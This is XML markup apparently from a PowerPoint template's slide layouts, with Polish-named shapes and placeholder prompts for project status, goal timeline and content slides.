            <a:off x="822703" y="3066951"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Obraz 38"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392896" y="4870594"/>
            <a:ext cx="161912" cy="215882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Obraz 39"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="363187" y="1556141"/>
            <a:ext cx="226223" cy="238498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Obraz 40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="364624" y="3165182"/>
            <a:ext cx="224784" cy="323373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Symbol zastępczy tekstu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701529"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
        <p:nvSpPr>
          <p:cNvPr id="20" name="Symbol zastępczy tekstu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453598"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
        <p:nvSpPr>
          <p:cNvPr id="21" name="Symbol zastępczy tekstu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205325"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3777155567"/>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3" name="Prostokąt 2"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Tytuł 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286917" y="2955779"/>
            <a:ext cx="3976858"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34" name="Symbol zastępczy tekstu 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286943" y="3958416"/>
            <a:ext cx="3987106"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35" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6521143" y="5208887"/>
            <a:ext cx="684861" cy="632179"/>
            <a:chOff x="5779" y="5058"/>
            <a:chExt cx="624" cy="576"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36"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6"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pic>
        <p:nvPicPr>
          <p:cNvPr id="64"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1670" y="580958"/>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8477149"/>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6" y="2955779"/>
            <a:ext cx="3956311"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4" name="Symbol zastępczy tekstu 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286943" y="3958416"/>
            <a:ext cx="3956284" cy="828675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2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7"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85241"/>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ymbol zastępczy tekstu 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274954" y="4840282"/>
            <a:ext cx="3945829"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9" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6521143" y="5208887"/>
            <a:ext cx="684861" cy="632179"/>
            <a:chOff x="5779" y="5058"/>
            <a:chExt cx="624" cy="576"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10"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6"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808818777"/>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Break / Final">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6" y="2955779"/>
            <a:ext cx="3956311" cy="946442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EDIT TEXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781547740"/>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196976"/>
            <a:ext cx="8593931" cy="5008562"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2644576302"/>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481" y="1196978"/>
            <a:ext cx="8593931" cy="5008563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Up to nine lines of text.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1734487507"/>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6" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660643" y="1196978"/>
            <a:ext cx="4219769" cy="5008563"/>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843854853"/>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3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286918" y="1196978"/>
            <a:ext cx="4185047" cy="5008563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Up to nine lines of text.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Symbol zastępczy tekstu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695365" y="1196978"/>
            <a:ext cx="4185047" cy="5008563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Up to nine lines of text.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2919089103"/>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4" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286942" y="1196976"/>
            <a:ext cx="2762088" cy="500856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5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202619" y="1196976"/>
            <a:ext cx="2762088" cy="5008562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118322" y="1196976"/>
            <a:ext cx="2762088" cy="5008562"/>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1252319411"/>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Break / Final">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8" y="2955779"/>
            <a:ext cx="3997406" cy="946442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EDIT TEXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4148543113"/>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9"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smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695656" y="1196974"/>
            <a:ext cx="4184754" cy="2435912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>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959344232"/>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4695656" y="1196974"/>
            <a:ext cx="4184754" cy="243591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28691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3682426963"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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451257363"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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878226"/>
            <a:ext cx="8593931"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2080363028"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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7" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660643" y="1878226"/>
            <a:ext cx="4219769" cy="4327311"/>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3801666777"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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2168731426"/>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4695656"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2546612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5"/>
            <a:ext cx="9144000" cy="6316663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Full size screen shot.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Right click to paste picture if copying from other slide. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Left click in center to browse for file to place.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1572553487"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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Status</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286941" y="2174794"/>
            <a:ext cx="2762250" cy="4030749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Completed projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118160" y="2174794"/>
            <a:ext cx="2762250" cy="4030749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Upcoming projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202538" y="2174794"/>
            <a:ext cx="2762250" cy="4030749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Prostokąt 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286919" y="1421032"/>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ole tekstowe 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721821" y="1509581"/>
            <a:ext cx="1568250" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COMPLETED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Prostokąt 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202515" y="1421032"/>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pole tekstowe 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643947" y="1509581"/>
            <a:ext cx="976742" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACTIVE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Prostokąt 14"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118162" y="1421032"/>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pole tekstowe 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6523004" y="1509581"/>
            <a:ext cx="1480085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPCOMING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Obraz 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239626" y="1578756"/>
            <a:ext cx="201318" cy="215882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Obraz 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="425049" y="1556141"/>
            <a:ext cx="226223" cy="238498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Obraz 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3323322" y="1509585"/>
            <a:ext cx="224784" cy="323373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2490713372"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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dirty="0" smtClean="0"/>
              <a:t>Goal Timeline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Prostokąt 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286918" y="1421032"/>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Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326156"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18" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326156"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19" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326156" y="3066951"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Prostokąt 24"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286916" y="3061199"/>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Prostokąt 25"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286917" y="4712870"/>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Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574430"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28" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574430"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29" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574430" y="3066951"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
